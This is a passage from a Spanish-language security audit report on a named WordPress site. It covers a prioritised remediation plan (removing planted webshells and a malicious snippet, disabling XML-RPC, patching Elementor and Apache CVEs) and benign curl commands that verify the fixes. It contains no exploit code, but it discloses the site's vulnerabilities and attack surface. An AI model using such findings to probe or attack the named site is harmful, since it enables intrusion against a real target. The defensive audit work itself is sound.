fall\u00f3 con \u00abno hit in 500 rounds\u00bb.\n        \nRemediaci\u00f3n\n        \n# Actualizar el kernel del host cuando est\u00e9 disponible el parche\n# El seccomp profile actual ya protege contra este CVE\n      \n    \n\n  \n\n  \n\n    \nPlan de Remediaci\u00f3n \u00b7 Prioridad\n    \n\n      HOY (cr\u00edtico): Cambiar contrase\u00f1a de marce (m\u00ednimo 20 chars). Eliminar wp-loginizer.php, 2ops.php y todos los ficheros de auditor\u00eda del webroot. Desactivar XML-RPC. Eliminar plugin Code Snippets y el snippet malicioso.\n    \n    \n\n      Esta semana: Actualizar Elementor a \u2265 4.0.5 (parchea CVE-2026-6127). Actualizar Apache a 2.4.67 (parchea CVE-2026-23918 y CVE-2026-24072). Auditar todos los archivos PHP modificados en los \u00faltimos 90 d\u00edas. Configurar SMTP y unificar mensajes de error de wp-login. Restringir REST API users a autenticados. A\u00f1adir cabeceras de seguridad HTTP.\n    \n    \n\n      Este mes: Implementar 2FA para el panel de administraci\u00f3n. Migrar credenciales DB a Docker secrets. Configurar DISABLE_WP_CRON y cron real del sistema. Implementar WAF en Cloudflare para xmlrpc.php y ?author=. Eliminar readme.html y establecer ServerTokens Prod.\n    \n  \n\n  \n\n    \nAnexo \u00b7 Comandos de verificaci\u00f3n post-remediaci\u00f3n\n    \nEjecutar estos comandos tras aplicar las correcciones para confirmar que los vectores est\u00e1n cerrados:\n    \n# C-01: XML-RPC deshabilitado\ncurl -s -X POST https://columtech.online/xmlrpc.php | grep -c \"XML-RPC server accepts\"\n# Esperado: 0\n\n# C-02: Webshells eliminadas\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/wp-loginizer.php\n# Esperado: 404\n\n# H-03: REST users requiere autenticaci\u00f3n\ncurl -s https://columtech.online/index.php?rest_route=/wp/v2/users | jq '.code'\n# Esperado: \"rest_forbidden\"\n\n# H-03: ?author= no revela usuario\ncurl -s -o /dev/null -w \"%{redirect_url}\" \"https://columtech.online/?author=1\"\n# Esperado: vac\u00edo o URL sin slug de usuario\n\n# L-01: HSTS presente\ncurl -sI https://columtech.online/ | grep -i strict-transport\n# Esperado: Strict-Transport-Security: max-age=...\n\n# L-03: readme.html eliminado\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/readme.html\n# Esperado: 404\n  \n\n\n\n\n\n  Auditor\u00eda realizada por c4sh3r \u00b7 Reporte generado el 2026-06-04\n  Todos los hallazgos fueron verificados en entorno real con autorizaci\u00f3n del propietario. Las pruebas de escritura (defacing, webshells) fueron limpiadas inmediatamente tras la verificaci\u00f3n. PII real redactada.\n\n\n\n\n", "creation_timestamp": "2026-06-03T23:46:41.000000Z"}]}